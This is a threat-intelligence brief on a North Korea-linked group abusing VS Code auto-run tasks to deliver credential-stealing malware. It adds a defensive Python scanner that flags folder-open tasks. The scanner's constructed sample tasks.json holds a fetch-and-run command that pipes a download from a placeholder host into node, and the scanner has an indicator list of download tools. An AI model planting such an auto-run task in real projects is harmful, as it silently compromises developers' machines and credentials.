
North Korean APT Team 8 Leverages VS Code Auto‑Run Tasks to Deploy StoatWaffle Malware

Team 8, a North Korea‑linked threat group, is abusing Visual Studio Code’s auto‑run tasks to silently install the multi‑stage StoatWaffle malware, stealing credentials and providing remote access across Windows, macOS, and Linux environments. The technique expands the attack surface for any organization that permits developers to open untrusted VS Code projects.

🛡️ LiveThreat™ Intelligence · 📅 March 24, 2026 · 📰 securityaffairs.com

  • Severity: High
  • Type: ThreatIntel
  • Confidence: High
  • Affected: 3 sector(s)
  • Actions: 4 recommended
  • Source: securityaffairs.com


What Happened — Team 8, a North Korea‑linked APT, has been abusing the tasks.json auto‑run feature in Microsoft Visual Studio Code projects to silently download and execute the StoatWaffle malware suite. The malicious repositories appear legitimate (often posing as blockchain‑related projects) and trigger payloads whenever a folder is opened in VS Code.

Why It Matters for TPRM

  • The technique runs inside a trusted developer tool, evading many endpoint protections.
  • It can compromise Windows, macOS, and Linux workstations, stealing browser credentials, extension data, and macOS Keychain entries.
  • Supply‑chain infection via public code repositories expands the attack surface for any organization that allows developers to pull external VS Code projects.

Who Is Affected — Software development teams, SaaS platforms hosting code repositories, and any enterprise that permits VS Code usage on employee workstations.

Recommended Actions

  • Disable or tightly control VS Code’s auto‑run tasks; require manual review of .vscode/tasks.json files from untrusted sources.
  • Enforce application‑allowlisting for VS Code and Node.js runtimes.
  • Deploy monitoring for anomalous outbound traffic to known C2 domains and for credential‑theft indicators on developer machines.
  • Conduct security awareness training focused on the risks of opening unverified VS Code projects.

Technical Notes — The attacker places a malicious tasks.json that launches a downloader from Vercel, installs Node.js if missing, and runs a multi‑stage loader. Modules include a credential stealer (browsers, extensions, macOS Keychain, WSL) and a RAT for remote command execution. Source: Security Affairs
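As a defensive triage aid for the "require manual review of .vscode/tasks.json files" recommendation above and the auto-run behaviour described in the Technical Notes, the following is an added Python example; it is not code from the Security Affairs report, from the brief's author, or from any tool they mention. It parses a tasks.json (including the // comments and trailing commas VS Code permits), lists every task configured with runOptions.runOn set to folderOpen, and flags command strings that contain download or inline-execution fragments. The embedded tasks.json is a constructed sample written to mirror the described pattern, the SUSPICIOUS indicator list is an assumption of the example, and example.invalid is a placeholder host.

```python
"""Triage helper: list VS Code tasks that run automatically on folder open.

Added example, not part of the original brief or the campaign reporting.
The sample tasks.json below is constructed; it is not taken from the campaign.
"""
import json
import re

# VS Code runs a task without user interaction when runOptions.runOn is "folderOpen".
AUTO_RUN = "folderOpen"

# Assumed indicator list: fragments that often mean "fetch something and run it".
SUSPICIOUS = ("curl", "wget", "Invoke-WebRequest", "iwr", "node -e",
              "bash -c", "sh -c", "powershell", "http://", "https://")


def strip_jsonc(text):
    """Remove // and /* */ comments outside strings, then drop trailing commas.

    tasks.json is JSONC, so json.loads() on the raw file fails; comment markers
    inside strings (e.g. the // in a URL) must be preserved.
    """
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:      # keep escaped char, including \"
                out.append(text[i + 1])
                i += 2
                continue
            if c == '"':
                in_str = False
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def task_command(task):
    """Join everything from a task that ends up on a shell command line,
    including the per-OS overrides (windows/linux/osx) tasks.json allows."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    for os_key in ("windows", "linux", "osx"):
        override = task.get(os_key) or {}
        parts.append(str(override.get("command", "")))
        parts += [str(a) for a in override.get("args", [])]
    return " ".join(p for p in parts if p)


def find_auto_run_tasks(text):
    """Return a finding per folderOpen task: label, command line, matched indicators."""
    data = json.loads(strip_jsonc(text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != AUTO_RUN:
            continue
        cmd = task_command(task)
        hits = [s for s in SUSPICIOUS if s.lower() in cmd.lower()]
        findings.append({"label": task.get("label", "<unnamed>"),
                         "command": cmd, "indicators": hits})
    return findings


# Constructed sample (not from the campaign): one benign build task and one
# folderOpen task that pipes a download into an interpreter.
SAMPLE_TASKS_JSON = r'''{
  // comment and trailing comma below are legal in VS Code's JSONC
  "version": "2.0.0",
  "tasks": [
    { "label": "build", "type": "shell", "command": "npm run build", },
    {
      "label": "setup",
      "type": "shell",
      "command": "curl -fsSL https://example.invalid/bootstrap.js | node",
      "runOptions": { "runOn": "folderOpen" }
    }
  ]
}'''

if __name__ == "__main__":
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(f"AUTO-RUN task {f['label']!r}: {f['command']}")
        print(f"  indicators: {f['indicators'] or 'none'}")
```

Pointed at a checked-out repository, the same function can be run over `.vscode/tasks.json` before the folder is ever opened in the editor; a task that is present in the output deserves review regardless of whether any indicator matched, because the auto-run setting itself is the behaviour the brief warns about.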

📰 Original Source
https://securityaffairs.com/189880/security/north-korea-linked-threat-actors-abuse-vs-code-auto-run-to-spread-stoatwaffle-malware.html

This LiveThreat Intelligence Brief is an independent analysis. Read the original reporting at the link above.
